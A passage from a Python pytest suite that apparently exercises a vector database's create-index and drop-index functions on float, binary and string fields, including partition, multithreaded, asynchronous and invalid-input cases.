fields = [cf.gen_int64_field(), cf.gen_float_vec_field(dim=dim)]
schema = cf.gen_collection_schema(fields, primary_field=ct.default_int64_field_name)
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(), schema=schema)
# generating the data with python's built-in random as usual doesn't reproduce the crash
data = [[i for i in range(nb)], np.random.random([nb, dim]).tolist()]
collection_w.insert(data)
log.debug(collection_w.num_entities)
index_params = {"index_type": "ANNOY", "metric_type": "IP", "params": {"n_trees": 10}}
index_wrapper = ApiIndexWrapper()
index, _ = index_wrapper.init_index(collection_w.collection, ct.default_float_vec_field_name, index_params)
assert index.params == index_params
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_non_existed_field(self):
"""
target: test create index interface
method: create collection and add entities in it, create index on other field
expected: error raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
collection_w.create_index(ct.default_int8_field_name, default_index_params,
index_name=ct.default_index_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "cannot create index on non-existed field: int8"}
)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_no_vectors(self):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return success
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
collection_w.create_index(ct.default_float_vec_field_name, default_index_params,
index_name=ct.default_index_name)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_partition(self):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: index created successfully
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
data = cf.gen_default_list_data()
ins_res, _ = partition_w.insert(data)
assert len(ins_res.primary_keys) == len(data[0])
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_partition_flush(self):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: index created successfully
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
data = cf.gen_default_list_data(default_nb)
partition_w.insert(data)
assert collection_w.num_entities == default_nb
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_without_connect(self):
"""
target: test create index without connection
method: create collection and add entities in it, remove the connection, then create index
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
collection_w.create_index(ct.default_float_vec_field_name, ct.default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "should create connect first"})
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_search_with_query_vectors(self):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
collection_w.load()
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_multithread(self):
"""
target: test create index interface with multiple threads
method: create collection, then insert entities and create index concurrently from several threads
expected: index created successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
def build(collection_w):
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
threads_num = 8
threads = []
for i in range(threads_num):
t = MyThread(target=build, args=(collection_w,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_insert_flush(self, get_simple_index):
"""
target: test create index
method: create collection, add entities and flush, then create index
expected: create index ok, and count correct
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
assert collection_w.num_entities == default_nb
collection_w.create_index(ct.default_float_vec_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L1)
def test_create_same_index_repeatedly(self):
"""
target: check if index can be created repeatedly, with the same create_index params
method: create the same index again after the index has been built
expected: return code success, and search ok
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
collection_w.create_index(ct.default_float_vec_field_name, default_index_params)
assert len(collection_w.indexes) == 1
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_different_name(self):
"""
target: check that a second index with a different name cannot be created on the same field
method: create an index, then create another index on the same field with a different index name
expected: raise error
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_index_params, index_name="a")
collection_w.create_index(ct.default_float_vec_field_name, default_index_params, index_name="b",
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "CreateIndex failed: creating multiple indexes on same field is not supported"})
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_repeatedly_new(self):
"""
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: drop index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
index_params = [default_index, {"metric_type": "L2", "index_type": "IVF_SQ8", "params": {"nlist": 1024}}]
for index in index_params:
index_name = cf.gen_unique_str("name")
collection_w.create_index(default_float_vec_field_name, index, index_name=index_name)
collection_w.load()
collection_w.drop_index(index_name=index_name)
assert len(collection_w.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_ip(self):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: index created successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_no_vectors_ip(self):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return success
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params,
index_name=ct.default_index_name)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_partition_ip(self):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: index created successfully
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
data = cf.gen_default_list_data(default_nb)
ins_res, _ = partition_w.insert(data)
assert len(ins_res.primary_keys) == len(data[0])
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_partition_flush_ip(self):
"""
target: test create index
method: create collection and partition, add entities in it, then create index
expected: create index ok, and count correct
"""
collection_w = self.init_collection_wrap()
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
data = cf.gen_default_list_data(default_nb)
partition_w.insert(data)
assert collection_w.num_entities == default_nb
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_search_with_query_vectors_ip(self):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params)
collection_w.load()
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_ip_params, default_limit,
default_search_exp)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread_ip(self):
"""
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return success
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
def build(collection_w):
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params)
threads_num = 8
threads = []
for i in range(threads_num):
t = MyThread(target=build, args=(collection_w,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_no_vectors_insert_ip(self):
"""
target: test create index interface when there are no vectors in the collection,
and that it does not affect the subsequent process
method: create collection with no vectors in it, create index,
then add entities to it
expected: insert succeeds
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params)
collection_w.insert(data=data)
assert collection_w.num_entities == default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_create_same_index_repeatedly_ip(self):
"""
target: check if index can be created repeatedly, with the same create_index params
method: create the same index again after the index has been built
expected: return code success, and search ok
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params)
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params)
assert len(collection_w.indexes) == 1
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_different_name_ip(self):
"""
target: check that a second index with a different name cannot be created on the same field
method: create an index, then create another index on the same field with a different index name
expected: raise error
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(default_nb)
collection_w.insert(data=data)
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params, index_name="a")
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params, index_name="b",
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "CreateIndex failed: creating multiple indexes on same field is not supported"})
def test_create_different_index_repeatedly_ip(self):
"""
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: drop index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
index_params = [default_ip_index_params,
{"metric_type": "IP", "index_type": "IVF_SQ8", "params": {"nlist": 1024}}]
for index in index_params:
index_name = cf.gen_unique_str("name")
collection_w.create_index(default_float_vec_field_name, index, index_name=index_name)
collection_w.load()
collection_w.drop_index(index_name=index_name)
assert len(collection_w.collection.indexes) == 0
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index(self, get_simple_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: index dropped successfully and no index left
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
if get_simple_index["index_type"] != "FLAT":
collection_w.create_index(ct.default_float_vec_field_name, get_simple_index,
index_name=ct.default_index_name)
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=ct.default_index_name)
assert len(collection_w.indexes) == 0
@pytest.mark.tags(CaseLabel.L2)
# TODO #7372
def test_drop_index_repeatedly(self, get_simple_index):
"""
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
if get_simple_index["index_type"] != "FLAT":
collection_w.create_index(ct.default_float_vec_field_name, get_simple_index,
index_name=ct.default_index_name)
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=ct.default_index_name)
assert len(collection_w.indexes) == 0
collection_w.drop_index(index_name=ct.default_index_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: "Index doesn\'t exist."})
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect(self):
"""
target: test drop index without connection
method: create index, remove the connection, then try to drop the index
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
collection_w.create_index(ct.default_float_vec_field_name, default_index_params,
index_name=ct.default_index_name)
self.connection_wrap.remove_connection(ct.default_alias)
collection_w.drop_index(index_name=ct.default_index_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: "should create connect first."})
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly(self, get_simple_index):
"""
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
if get_simple_index["index_type"] != "FLAT":
for i in range(4):
collection_w.create_index(ct.default_float_vec_field_name, get_simple_index,
index_name=ct.default_index_name)
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=ct.default_index_name)
assert len(collection_w.indexes) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_ip(self, get_simple_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: index dropped successfully and no index left
"""
get_simple_index["metric_type"] = "IP"
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
if get_simple_index["index_type"] != "FLAT":
collection_w.create_index(ct.default_float_vec_field_name, get_simple_index,
index_name=ct.default_index_name)
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=ct.default_index_name)
assert len(collection_w.indexes) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_repeatedly_ip(self, get_simple_index):
"""
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
"""
get_simple_index["metric_type"] = "IP"
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
if get_simple_index["index_type"] != "FLAT":
collection_w.create_index(ct.default_float_vec_field_name, get_simple_index,
index_name=ct.default_index_name)
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=ct.default_index_name)
assert len(collection_w.indexes) == 0
collection_w.drop_index(index_name=ct.default_index_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: "Index doesn\'t exist."})
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect_ip(self):
"""
target: test drop index without connection
method: create index, remove the connection, then try to drop the index
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
collection_w.create_index(ct.default_float_vec_field_name, default_ip_index_params,
index_name=ct.default_index_name)
self.connection_wrap.remove_connection(ct.default_alias)
collection_w.drop_index(index_name=ct.default_index_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: "should create connect first."})
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly_ip(self, get_simple_index):
"""
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
"""
get_simple_index["metric_type"] = "IP"
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
if get_simple_index["index_type"] != "FLAT":
for i in range(4):
collection_w.create_index(ct.default_float_vec_field_name, get_simple_index,
index_name=ct.default_index_name)
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=ct.default_index_name)
assert len(collection_w.indexes) == 0
@pytest.mark.tags(CaseLabel.L0)
def test_create_PQ_without_nbits(self):
"""
target: test create PQ index
method: create PQ index without nbits
expected: create successfully
"""
PQ_index = {"index_type": "IVF_PQ", "params": {"nlist": 128, "m": 16}, "metric_type": "L2"}
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
collection_w.create_index(ct.default_float_vec_field_name, PQ_index, index_name=ct.default_index_name)
assert len(collection_w.indexes) == 1
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_collection_not_create_ip(self):
"""
target: test drop index interface when index not created
method: create collection and add entities in it, then drop index without creating one
expected: error raised, drop index failed
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
collection_w.drop_index(index_name=default_field_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: "Index doesn\'t exist."})
class TestNewIndexBinary(TestcaseBase):
def get_simple_index(self, request):
log.info(request.param)
return copy.deepcopy(request.param)
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
# @pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: index created successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data()
collection_w.insert(data=df)
collection_w.create_index(default_string_field_name, default_string_index_params, index_name=binary_field_name)
assert collection_w.has_index(index_name=binary_field_name)[0] == True
@pytest.mark.tags(CaseLabel.L0)
# @pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: index created successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
df, _ = cf.gen_default_binary_dataframe_data()
ins_res, _ = partition_w.insert(df)
assert len(ins_res.primary_keys) == len(df)
collection_w.create_index(default_binary_vec_field_name, default_binary_index_params,
index_name=binary_field_name)
assert collection_w.has_index(index_name=binary_field_name)[0] == True
assert len(collection_w.indexes) == 1
@pytest.mark.tags(CaseLabel.L0)
# @pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data()
collection_w.insert(data=df)
collection_w.create_index(default_binary_vec_field_name, default_binary_index_params,
index_name=binary_field_name)
collection_w.load()
_, vectors = cf.gen_binary_vectors(default_nq, default_dim)
collection_w.search(vectors[:default_nq], binary_field_name,
default_search_binary_params, default_limit,
default_search_exp)
# @pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_invalid_metric_type_binary(self):
"""
target: test create index interface with invalid metric type
method: add entities into binary collection, flush, create index with L2 metric type.
expected: return create_index failure
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
binary_index_params = {'index_type': 'BIN_IVF_FLAT', 'metric_type': 'L2', 'params': {'nlist': 64}}
collection_w.create_index(default_binary_vec_field_name, binary_index_params,
index_name=binary_field_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0,
ct.err_msg: "Invalid metric_type: L2, which does not match the index type: BIN_IVF_FLAT"})
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index(self):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: index dropped successfully and no index left
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data()
collection_w.insert(data=df)
collection_w.create_index(default_binary_vec_field_name, default_binary_index_params,
index_name=binary_field_name)
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=binary_field_name)
assert len(collection_w.indexes) == 0
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_partition(self):
"""
target: test drop index interface
method: create collection, create partition and add entities in it,
create index on collection, call drop collection index
expected: index dropped successfully and no index left
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
df, _ = cf.gen_default_binary_dataframe_data()
ins_res, _ = partition_w.insert(df)
assert len(ins_res.primary_keys) == len(df)
collection_w.create_index(default_binary_vec_field_name, default_binary_index_params,
index_name=binary_field_name)
assert collection_w.has_index(index_name=binary_field_name)[0] == True
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=binary_field_name)
assert collection_w.has_index(index_name=binary_field_name)[0] == False
assert len(collection_w.indexes) == 0
class TestIndexInvalid(object):
"""
Test create / describe / drop index interfaces with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test create index interface for invalid scenario
method: create index with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test drop index interface for invalid scenario
method: drop index with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.drop_index(collection_name)
@pytest.fixture(
scope="function",
params=gen_invalid_index()
)
def get_index(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_index_params(self, connect, collection, get_index):
"""
target: test create index interface for invalid scenario
method: create index with invalid index params
expected: raise exception
"""
log.info(get_index)
with pytest.raises(Exception) as e:
connect.create_index(collection, field_name, get_index)
class TestNewIndexAsync(TestcaseBase):
@pytest.fixture(scope="function", params=[False, True])
def _async(self, request):
yield request.param
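# simple callback intended to be passed to create_index via `_callback` for asynchronous index builds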
def call_back(self):
assert True
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
# @pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, _async):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: index created successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
res, _ = collection_w.create_index(ct.default_float_vec_field_name, default_index_params,
index_name=ct.default_index_name, _async=_async)
if _async:
res.done()
assert len(collection_w.indexes) == 1
@pytest.mark.tags(CaseLabel.L0)
# @pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_drop(self, _async):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: index created and then dropped successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
res, _ = collection_w.create_index(ct.default_float_vec_field_name, default_index_params,
index_name=ct.default_index_name, _async=_async)
if _async:
res.done()
assert len(collection_w.indexes) == 1
collection_w.drop_index(index_name=ct.default_index_name)
assert len(collection_w.indexes) == 0
@pytest.mark.tags(CaseLabel.L0)
# @pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_callback(self):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: index created successfully and the callback invoked
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
res, _ = collection_w.create_index(ct.default_float_vec_field_name, default_index_params,
index_name=ct.default_index_name, _async=True,
_callback=self.call_back)
class TestIndexString(TestcaseBase):
"""
******************************************************************
The following cases are used to test create index about string
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_with_string_field(self):
"""
target: test create index on a string field that is not the primary key
method: 1.create collection and insert data
2.create an index only on the non-primary string field
expected: create index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
index, _ = self.index_wrap.init_index(collection_w.collection, default_string_field_name,
default_string_index_params)
cf.assert_equal_index(index, collection_w.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_with_string_before_load(self):
"""
target: test create index with string field before load
method: 1.create collection and insert data
2.create an index with string field before load
expected: create index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(ct.default_nb)
collection_w.insert(data=data)
index, _ = self.index_wrap.init_index(collection_w.collection, default_string_field_name,
default_string_index_params)
cf.assert_equal_index(index, collection_w.indexes[0])
collection_w.load()
assert collection_w.num_entities == default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_load_after_create_index_with_string(self):
"""
target: test load after create index with string field
method: 1.create collection and insert data
2.load the collection after creating an index on the string field
expected: create index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(ct.default_nb)
collection_w.insert(data=data)
collection_w.load()
index, _ = self.index_wrap.init_index(collection_w.collection, default_string_field_name,
default_string_index_params)
cf.assert_equal_index(index, collection_w.indexes[0])
assert collection_w.num_entities == default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_with_string_field_is_primary(self):
"""
target: test create index on a string field that is the primary key
method: 1.create collection
2.insert data
3.create an index only on the primary string field
expected: create index successfully
"""
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_string_pk_default_collection_schema()
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
index, _ = self.index_wrap.init_index(collection_w.collection, default_string_field_name,
default_string_index_params)
cf.assert_equal_index(index, collection_w.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_or_not_with_string_field(self):
"""
target: test create index on some of the string fields while leaving others unindexed
method: 1.create collection with multiple string fields
2.insert data
3.create an index on only one of the string fields
expected: create index successfully
"""
c_name = cf.gen_unique_str(prefix)
string_fields = [cf.gen_string_field(name="test_string")]
schema = cf.gen_schema_multi_string_fields(string_fields)
collection_w = self.init_collection_wrap(name=c_name, schema=schema)
df = cf.gen_dataframe_multi_string_fields(string_fields=string_fields)
collection_w.insert(df)
self.index_wrap.init_index(collection_w.collection, default_string_field_name, default_string_index_params)
@pytest.mark.tags(CaseLabel.L1)
def test_create_index_with_same_index_name(self):
"""
target: test create index on different fields using the same index name
method: 1.create collection
2.insert data
3.create indexes on two different fields using the same index name
expected: error raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
collection_w.create_index(default_string_field_name, default_string_index_params, index_name=index_name2)
collection_w.create_index(default_float_vec_field_name, default_index_params,
index_name=index_name2,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "CreateIndex failed"})
@pytest.mark.tags(CaseLabel.L1)
def test_create_different_index_fields(self):
"""
target: test create index with different fields
method: 1.create collection
2.insert data
3.create different indexes with string and float vector field
expected: create index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
collection_w.create_index(default_float_vec_field_name, default_index_params, index_name=index_name1)
assert collection_w.has_index(index_name=index_name1)[0] == True
collection_w.create_index(default_string_field_name, default_string_index_params, index_name=index_name2)
assert collection_w.has_index(index_name=index_name2)[0] == True
assert len(collection_w.indexes) == 2
@pytest.mark.tags(CaseLabel.L1)
def test_create_different_index_binary_fields(self):
"""
target: test creating indexes on string and binary vector fields
method: 1.create collection
2.insert data
3.create different indexes with string and binary vector field
expected: create index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data()
collection_w.insert(data=df)
collection_w.create_index(default_string_field_name, default_string_index_params, index_name=index_name2)
assert collection_w.has_index(index_name=index_name2)[0] == True
collection_w.create_index(default_binary_vec_field_name, default_binary_index_params, index_name=index_name3)
assert collection_w.has_index(index_name=index_name3)[0] == True
assert len(collection_w.indexes) == 2
@pytest.mark.tags(CaseLabel.L1)
def test_drop_index_with_string_field(self):
"""
target: test drop index with string field
method: 1.create collection and insert data
2.create index and use index.drop() to drop the index
expected: drop index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
index, _ = self.index_wrap.init_index(collection_w.collection, default_string_field_name,
default_string_index_params)
cf.assert_equal_index(index, collection_w.indexes[0])
self.index_wrap.drop()
assert len(collection_w.indexes) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_collection_drop_index_with_string(self):
"""
target: test drop index with string field
method: 1.create collection and insert data
2.create index and use collection.drop_index() to drop the index
expected: drop index successfully
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
collection_w.create_index(default_string_field_name, default_string_index_params, index_name=index_name2)
collection_w.drop_index(index_name=index_name2)
assert len(collection_w.indexes) == 0
